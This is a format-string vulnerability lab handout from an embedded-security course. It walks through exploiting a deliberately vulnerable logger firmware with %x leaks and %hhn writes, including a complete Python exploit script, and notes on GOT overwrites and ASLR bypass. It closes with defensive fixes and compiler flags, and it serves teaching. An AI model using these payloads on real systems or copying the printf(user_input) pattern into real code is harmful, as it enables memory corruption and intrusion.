Lab 02: Format String Vulnerability¶

Introduction¶

Format string vulnerabilities are a distinct class of memory corruption bug that surprised the security community when exploitation techniques became public in 2000. Unlike buffer overflows, which corrupt memory sequentially, format string bugs let an attacker read and write chosen addresses with surgical precision.

Difficulty: Medium
Category: Memory Corruption
Historical Context: WU-FTPD 2.6.0 (June 2000)

Learning Objectives¶

By completing this lab, you will:

Understand how printf format strings work internally
Master format string exploitation techniques
Learn to read and write arbitrary memory
Develop precision memory corruption skills
Appreciate secure coding practices for output functions

Historical Background¶

The WU-FTPD Discovery (2000)¶

In June 2000, a researcher known as "tf8" posted about a critical vulnerability in WU-FTPD 2.6.0, one of the most popular FTP servers. The bug was deceptively simple:

// Simplified illustration of the vulnerable pattern (not the verbatim WU-FTPD source)
sprintf(buf, user_controlled_string);

This discovery revealed an entire class of vulnerabilities hiding in plain sight. Within weeks, format string bugs were found in:

Linux rpc.statd (later exploited by the Ramen worm in 2001)
Various telnetd implementations
Logging daemons across platforms
Embedded device interfaces

Why Format Strings Shocked Security Researchers¶

Ubiquitous: Printf-family functions everywhere
Powerful: Read/write memory without overflow
Subtle: Easy to introduce, hard to spot
Precise: Byte-level memory manipulation

Vulnerability Overview¶

How Printf Works¶

Printf processes format specifiers to display variables:

int value = 42;
printf("Value: %d at %p\n", value, &value);

Format specifiers tell printf how to interpret arguments:

%d - Integer from next argument
%x - Hexadecimal from next argument
%s - String from pointer in next argument
%n - Write the number of bytes printed so far to the address in the next argument

The Vulnerability¶

When the user controls the format string:

void log_activity(char *user_input) {
    printf(user_input);  // VULNERABLE!
}

They control how printf interprets the stack:

%x - Read stack values
%s - Read from arbitrary addresses
%n - Write to arbitrary addresses
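
To make the mechanism concrete, here is a minimal Python model of the argument walk. It is a sketch, not how any real printf is implemented: `toy_printf` and the `stack` list are hypothetical names, and only `%x` and `%N$x` are modelled. The point it illustrates is that each specifier consumes a word whether or not the caller actually passed an argument.

```python
import re

def toy_printf(fmt, stack):
    """Toy model: each %x consumes the next stack word; %N$x reads word N (1-based)."""
    out = []
    next_arg = 0  # index of the word the next plain %x would consume
    pos = 0
    for m in re.finditer(r'%(?:(\d+)\$)?x', fmt):
        out.append(fmt[pos:m.start()])        # literal text before the specifier
        if m.group(1):                        # positional form, e.g. %6$x
            word = stack[int(m.group(1)) - 1]
        else:                                 # sequential form
            word = stack[next_arg]
            next_arg += 1
        out.append(format(word, 'x'))
        pos = m.end()
    out.append(fmt[pos:])                     # trailing literal text
    return ''.join(out)

# Hypothetical stack contents, modelled on the lab output shown in the analysis steps
stack = [0x20000800, 0xdeadbeef, 0x64, 0x20000810, 0x0, 0x41414141]
print(toy_printf('%x %x %x %x', stack))   # 20000800 deadbeef 64 20000810
print(toy_printf('AAAA%6$x', stack))      # AAAA41414141
```

Because the caller supplied no arguments at all, everything the model prints comes from memory the attacker was never meant to see.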

Lab Setup¶

Prerequisites¶

Completed Lab 01 (Buffer Overflow)
Understanding of printf internals
Python 3 with pwntools recommended

Getting Started¶

Build and flash the vulnerable binary:

cd /labs/02-format-string
make
make flash

Connect to the target:
```
screen /dev/ttyACM0 115200
```

Explore the application:

=================================
    Activity Logger v2.1
    Enhanced Security Edition
=================================

1. Log activity
2. Check authentication
3. Show hints
4. Reset

Understanding the Target¶

Application Overview¶

The system is an "activity logger" with:

Logging Function: Vulnerable printf call
Authentication Check: Requires specific value in memory
Debug Hints: Shows important addresses
Stack Canary: Monitors for corruption

The Vulnerable Code¶

void log_activity(char *user_input)
{
    embsec_printf("Activity logged: ");
    embsec_printf(user_input);  // FORMAT STRING BUG!
    embsec_printf("\n");
}

The Goal¶

Set the authenticated variable to 0x41414141 to get the flag.

Vulnerability Analysis¶

Step 1: Confirm the Vulnerability¶

Test with format specifiers:

Enter activity to log: %x %x %x %x
Activity logged: 20000800 deadbeef 64 20000810

Success! We're reading stack values.

Step 2: Information Gathering¶

Use option 3 for hints:

=== System Information ===
Stack canary: 0xDEADBEEF (watching for corruption)
Auth variable: 0x20000C00 (current value: 0x00000000)
Auth success value: 0x41414141

Critical information:

Target address: 0x20000C00
Required value: 0x41414141
Stack canary present (but irrelevant here: a targeted %n write never touches it)

Step 3: Find Input Position¶

Locate our input on the stack:

Enter activity to log: AAAA %x %x %x %x %x %x
Activity logged: AAAA 20000800 deadbeef 64 20000810 0 41414141

Our input "AAAA" (0x41414141) is at position 6!
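
Counting positions by eye gets error-prone with longer probes. The search can be automated with a small helper; `find_offset` is a hypothetical name, and the sketch assumes the leak is a space-separated list of hex words as in the output above.

```python
def find_offset(leak_line, marker=b'AAAA'):
    """Return the 1-based position of the marker word in a '%x %x ...' leak, or None."""
    # The marker bytes are read back as one little-endian 32-bit word
    wanted = format(int.from_bytes(marker, 'little'), 'x')
    for position, word in enumerate(leak_line.split(), start=1):
        if word.lower() == wanted:
            return position
    return None

# Output captured from the probe above, minus the echoed "AAAA" prefix
leak = '20000800 deadbeef 64 20000810 0 41414141'
print(find_offset(leak))  # 6
```

A return value of `None` usually means the probe needs more `%x` specifiers.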

Step 4: Direct Parameter Access¶

Verify using direct parameter access:

Enter activity to log: AAAA%6$x
Activity logged: AAAA41414141

Perfect! We can reference our input directly.

Format String Techniques¶

1. Memory Reading¶

Reading Stack Values:

%x %x %x %x        # Read 4 stack values
%6$x               # Read 6th parameter directly
%100x              # Read with width (padding)

Reading Arbitrary Memory:

# Place address on stack, use %s to dereference
import struct

addr = 0x20000100            # example address to read from
payload = struct.pack('<I', addr)
payload += b'%6$s'           # Read string from addr (position 6 found in Step 3)

2. Memory Writing¶

The %n Specifier:

Writes number of bytes printed so far
Takes address from stack parameter
Variants: %n (4 bytes), %hn (2 bytes), %hhn (1 byte)
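
The three variants differ only in how much of the running count they store. The sketch below models that truncation, assuming a 32-bit `int` as on the lab's ARM target; `stored_value` is a hypothetical helper, not part of any library.

```python
def stored_value(printed, specifier):
    """Value a %n-family specifier stores after `printed` bytes of output."""
    widths = {'%n': 32, '%hn': 16, '%hhn': 8}   # bits written by each variant
    return printed & ((1 << widths[specifier]) - 1)

for spec in ('%n', '%hn', '%hhn'):
    print(spec, hex(stored_value(0x12345, spec)))
# %n 0x12345
# %hn 0x2345
# %hhn 0x45
```

This truncation is what makes byte-wise writes practical: only the low 8 bits of the count matter to `%hhn`.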

Basic Write:

# Write value 100 to address
import struct

target_addr = 0x20000C00     # auth variable from the hints
payload = struct.pack('<I', target_addr)
payload += b'%96x'   # Pad to 96 chars (4 address bytes + 96 = 100)
payload += b'%6$n'   # Write 100 to target_addr

3. Precision Writing¶

For exact values, use width specifiers:

# Write 0x41 to single byte
import struct

target = 0x20000C00          # byte to overwrite
payload = struct.pack('<I', target)
# Already printed 4 bytes (address)
payload += b'%61c'   # Print 61 chars (total 65 = 0x41)
payload += b'%6$hhn' # Write single byte
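
The width arithmetic generalizes to any byte value once the count is allowed to wrap modulo 256. A minimal sketch, with `pad_for_byte` as a hypothetical helper name:

```python
def pad_for_byte(target_byte, printed):
    """Extra characters needed so that (printed + pad) % 256 == target_byte."""
    return (target_byte - printed) % 256

print(pad_for_byte(0x41, 4))     # 61, matching the %61c above
print(pad_for_byte(0x41, 16))    # 49
print(pad_for_byte(0x10, 0x41))  # 207: wraps past 256 to reach a smaller value
```

A result of 0 means no padding specifier is needed before the `%hhn`.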

Exploitation¶

Understanding the Target Value¶

We need to write 0x41414141:

Four bytes, each containing 0x41
0x41 is 65 in decimal ('A' in ASCII), so each %hhn write needs the printed count to equal 65 modulo 256

Exploitation Strategy¶

Write each byte separately using %hhn:

Place 4 addresses on stack (target+0, +1, +2, +3)
Use width specifiers to control bytes printed
Write 0x41 to each address sequentially

Building the Exploit¶

#!/usr/bin/env python3
import struct
import time

import serial  # provided by the pyserial package

# Target configuration
target_addr = 0x20000C00
target_value = 0x41414141

# Serial setup
ser = serial.Serial('/dev/ttyACM0', 115200, timeout=1)

def send_command(cmd):
    ser.write(cmd.encode() + b'\n')
    time.sleep(0.1)

# Navigate to log activity
send_command('1')

# Build format string payload
payload = b''

# Place 4 addresses on stack
for i in range(4):
    payload += struct.pack('<I', target_addr + i)

# We've printed 16 bytes (4 addresses * 4 bytes each)
# Need to print 65 total for 0x41

# First byte: need 65 - 16 = 49 more
payload += b'%49c%6$hhn'

# Subsequent bytes: already at 65, just write
payload += b'%7$hhn'
payload += b'%8$hhn'
payload += b'%9$hhn'

# Send exploit
ser.write(payload + b'\n')

# Check authentication
time.sleep(0.5)
send_command('2')

# Read flag
response = ser.read(2000)
print(response.decode('latin-1'))
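
If the exploit prints nothing useful, it is worth checking the raw payload for bytes that can cut the input short. Whether this matters depends on how the firmware reads a line and how `embsec_printf` scans its format string, neither of which is shown in this lab, so treat the following as a diagnostic sketch. `risky_bytes` and its default `bad` set are assumptions chosen for illustration.

```python
import struct

def risky_bytes(payload, bad=b'\x00\n\r'):
    """Return (index, byte) pairs for bytes that may truncate or alter the input."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]

# The four packed addresses used by the exploit above
addresses = b''.join(struct.pack('<I', 0x20000C00 + i) for i in range(4))
for index, byte in risky_bytes(addresses):
    print(f'offset {index}: 0x{byte:02x}')
```

For this target the packed addresses do contain 0x00 bytes, which a printf that treats the format as a NUL-terminated C string would stop at. If that turns out to be the case on your board, a common workaround is to move the addresses to the end of the payload and adjust the parameter positions and printed-byte count accordingly.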

Manual Exploitation Steps¶

Calculate addresses:

for i in range(4):
    print(f"Address {i}: 0x{0x20000C00 + i:08x}")

Build payload:

import struct
p = b''
p += struct.pack('<I', 0x20000C00)
p += struct.pack('<I', 0x20000C01)
p += struct.pack('<I', 0x20000C02)
p += struct.pack('<I', 0x20000C03)
p += b'%49c%6$hhn%7$hhn%8$hhn%9$hhn'
print(repr(p))

Execute:
Select option 1
Paste payload
Select option 2
Get flag!

Expected Result¶

Choice: 2
ACCESS GRANTED!
Flag: embsec{f0rm4t_str1ng_wr1t3_4cc3ss}
Critical system compromise detected!

Advanced Techniques¶

1. Large Value Writes¶

Writing large values efficiently:

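import struct

target = 0x20000C00  # example target address

# Write 0xdeadbeef
# Little-endian layout: offset 0 = 0xef, 1 = 0xbe, 2 = 0xad, 3 = 0xde
# Order by value so the printed count only ever has to increase:
# 0xad, 0xbe, 0xde, 0xef
values = sorted([(0xef, 0), (0xbe, 1), (0xad, 2), (0xde, 3)])

payload = b''
# Place addresses in the same (sorted) order as the writes
for _, offset in values:
    payload += struct.pack('<I', target + offset)

printed = 16  # the four addresses already count as output
for index, (value, _) in enumerate(values):
    needed = value - printed
    if needed > 0:
        payload += f'%{needed}c'.encode()
    # Parameter 6 + index is the address placed at position `index` above
    payload += f'%{6 + index}$hhn'.encode()
    printed = value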
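
An alternative to sorting the writes is to keep the addresses in natural order and let the byte counter wrap modulo 256. It prints more padding but needs no bookkeeping. The sketch below builds such a payload and replays it against a toy memory model to check the result; `build_byte_writes` and `simulate` are hypothetical helpers, and the replay only understands the `%Nc` and `%N$hhn` specifiers this builder emits.

```python
import re
import struct

def build_byte_writes(target, value, first_param=6):
    """Build a %hhn payload that writes a 32-bit value at target, one byte at a time."""
    data = struct.pack('<I', value)                  # byte i belongs at target + i
    payload = b''.join(struct.pack('<I', target + i) for i in range(4))
    printed = len(payload)                           # the addresses count as output
    for i, byte in enumerate(data):
        pad = (byte - printed) % 256                 # wrap past 256 when needed
        if pad:
            payload += f'%{pad}c'.encode()
            printed += pad
        payload += f'%{first_param + i}$hhn'.encode()
    return payload

def simulate(payload, first_param=6):
    """Replay the payload against an empty memory model; return {address: byte}."""
    addrs = struct.unpack('<4I', payload[:16])
    memory, printed = {}, 16
    for pad, param in re.findall(rb'(?:%(\d+)c)?%(\d+)\$hhn', payload[16:]):
        printed += int(pad) if pad else 0
        memory[addrs[int(param) - first_param]] = printed % 256
    return memory

payload = build_byte_writes(0x20000C00, 0xdeadbeef)
memory = simulate(payload)
print(bytes(memory[0x20000C00 + i] for i in range(4)).hex())  # efbeadde
```

The printed bytes are in memory order, so `efbeadde` is 0xdeadbeef as a little-endian word. Called with 0x41414141, the same builder reproduces the format portion of the lab exploit.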

2. GOT Overwrite¶

Overwrite Global Offset Table entries:

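# GOT entry to overwrite (placeholder address; look up the real one in the ELF)
got_printf = 0x20001234

# Address the entry should point to afterwards (placeholder)
shellcode_addr = 0x20000500

# Use the byte-wise %hhn technique to write shellcode_addr into got_printf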

3. Stack Pivot¶

Use format string to modify stack pointer:

# Write to saved stack pointer
# Pivot to controlled memory
# Execute ROP chain

4. Information Disclosure¶

Leak critical addresses:

import struct

# Leak stack canary (offset 39 is illustrative; it depends on the target)
payload = b'%39$x'

# Leak return addresses (saved EIP on x86, LR on ARM)
payload = b'%40$x'

# Leak library addresses (bypass ASLR)
got_entry = 0x20001234  # placeholder GOT address
payload = struct.pack('<I', got_entry)
payload += b'%6$s'  # Dereference GOT

Defensive Measures¶

Immediate Fixes¶

Never Use User Input as Format String:

// Vulnerable
printf(user_input);
snprintf(buf, size, user_input);
syslog(LOG_INFO, user_input);

// Secure
printf("%s", user_input);
snprintf(buf, size, "%s", user_input);
syslog(LOG_INFO, "%s", user_input);

Use Format String Literals:

// Use string literals when possible
#define LOG_FORMAT "[%s] User: %s, Action: %s\n"
printf(LOG_FORMAT, timestamp, user, action);
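
During code review, a quick script can surface candidate call sites before a human looks at them. The following is a rough heuristic sketch, not a substitute for the compiler warnings: `suspicious_calls`, the `FORMAT_ARG` table, and the naive comma split are all assumptions made for illustration, and macro-defined formats such as `LOG_FORMAT` will show up as false positives.

```python
import re

# Index of the format argument for a few printf-family functions
FORMAT_ARG = {'printf': 0, 'fprintf': 1, 'sprintf': 1, 'snprintf': 2, 'syslog': 1}
CALL = re.compile(r'\b(' + '|'.join(FORMAT_ARG) + r')\s*\(([^;]*)\)\s*;')

def suspicious_calls(source):
    """Yield (function, format_argument) for calls whose format is not a string literal."""
    for name, args in CALL.findall(source):
        parts = [p.strip() for p in args.split(',')]   # naive split, fine for a sketch
        index = FORMAT_ARG[name]
        if index < len(parts) and not parts[index].startswith('"'):
            yield name, parts[index]

sample = '''
printf(user_input);
printf("%s", user_input);
snprintf(buf, size, user_input);
syslog(LOG_INFO, "%s", user_input);
'''
print(list(suspicious_calls(sample)))
# [('printf', 'user_input'), ('snprintf', 'user_input')]
```

Project-specific wrappers such as `embsec_printf` are not matched by this pattern and would need to be added to the table.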

Compiler Protections¶

Enable format string warnings:

CFLAGS += -Wformat=2
CFLAGS += -Wformat-security
CFLAGS += -Werror=format-security

Runtime Protections¶

FORTIFY_SOURCE (only takes effect when optimization is enabled, e.g. -O2):
```
CFLAGS += -D_FORTIFY_SOURCE=2
```
Stack Canaries (limited effectiveness against format strings)
RELRO (Relocation Read-Only):
```
LDFLAGS += -Wl,-z,relro,-z,now
```

Common Pitfalls¶

1. Parameter Counting¶

Problem: Wrong position for direct parameter access
Solution: Test with AAAA and %x to find position

2. Alignment Issues¶

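Problem: Word (%n) and halfword (%hn) writes to unaligned addresses can fault on some ARM cores
Solution: Keep %n targets 4-byte aligned and %hn targets 2-byte aligned; byte writes with %hhn work at any address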

3. Width Calculation¶

Problem: Incorrect byte counts for %n
Solution: Track bytes printed carefully, including addresses

4. Format String Limits¶

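Problem: Some implementations cap field widths, and some embedded printf variants omit %n or positional (%N$) arguments
Solution: Use several smaller writes, or fall back to sequential specifiers to reach the right argument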

Real-World Impact¶

Format string bugs in the wild:

Historical Exploits¶

2000: WU-FTPD 2.6.0 remote root
2001: Linux rpc.statd (Ramen worm)
2002: OpenBSD ftpd
2003: Linux kernel vsprintf

Modern Occurrences¶

2012: sudo format string in debug logging (CVE-2012-0809)
2020: Windows Print Spooler
IoT Devices: Common in embedded systems
Web Applications: Printf-style template engines

Comparison with Buffer Overflows¶

| Aspect | Buffer Overflow | Format String |
| --- | --- | --- |
| Discovery | Obvious pattern | Subtle mistake |
| Precision | Sequential corruption | Surgical writes |
| Read Capability | Limited | Extensive |
| Write Capability | Sequential | Arbitrary |
| Bypass Protections | Harder | Often easier |
| Complexity | Lower | Higher |

Key Takeaways¶

Format String Power: Read/write anywhere without overflow
Always Use %s: Never pass user input as format string
Compiler Warnings: Enable and heed format warnings
Defense in Depth: Multiple protections needed
Code Review: Look for printf-family vulnerabilities

Challenges¶

Challenge 1: No Debug Output¶

No debug output - can you still exploit?

Use %x to map memory
Find addresses through leaks
Brute force if necessary

Challenge 2: Limited Input Length¶

Only 32 bytes allowed:

Use short writes (%hn)
Multiple exploitation rounds
Leverage existing values
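
To see why short writes help here, compare payload lengths. The sketch below reuses the lab's target address and stack position and assumes the printf on the target supports `%hn` and large field widths, which is not guaranteed on every embedded implementation.

```python
import struct

TARGET = 0x20000C00   # address from the lab hints
PARAM = 6             # stack position found in Step 3

# Byte-wise version from the main exploit: four addresses, four %hhn writes
byte_payload = b''.join(struct.pack('<I', TARGET + i) for i in range(4))
byte_payload += b'%49c%6$hhn%7$hhn%8$hhn%9$hhn'

# Halfword version: two addresses, two %hn writes of 0x4141 each
short_payload = struct.pack('<I', TARGET) + struct.pack('<I', TARGET + 2)
pad = 0x4141 - len(short_payload)          # 16705 - 8 = 16697 padding characters
short_payload += f'%{pad}c%{PARAM}$hn%{PARAM + 1}$hn'.encode()

print(len(byte_payload), len(short_payload))  # 44 25
```

The halfword payload fits in 32 bytes, at the cost of making the target print roughly 16 KB of padding, which takes over a second at 115200 baud.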

Challenge 3: ASLR Enabled¶

Randomized addresses:

Leak base addresses first
Use relative offsets
Partial overwrites
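
The "leak, then use relative offsets" step is plain arithmetic once one absolute address is known. A minimal sketch with hypothetical numbers; `rebase` and both offsets are made up for illustration and would come from the binary's symbol table in practice.

```python
def rebase(leaked_addr, leaked_offset, wanted_offset):
    """Turn one leaked absolute address into another address in the same image."""
    base = leaked_addr - leaked_offset     # load address chosen by ASLR for this run
    return base + wanted_offset

# Hypothetical: a leaked pointer known to sit 0x1234 bytes into the image,
# and a target variable 0x4c00 bytes into the same image
leak = 0x5581a3e01234
print(hex(rebase(leak, 0x1234, 0x4c00)))  # 0x5581a3e04c00
```

The offsets stay constant across runs even though the base changes, which is why a single leak is enough.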

Next Steps¶

Congratulations on mastering format string exploitation! You've learned:

How printf processes format specifiers
Reading stack values with %x and arbitrary memory with %s
Writing arbitrary memory with %n
Precision memory corruption techniques
Why format string bugs are dangerous

Consider exploring:

Advanced ROP techniques
Heap exploitation methods
Integer overflow vulnerabilities
Race conditions in embedded systems

"With great power comes great responsibility" - Always use format strings safely!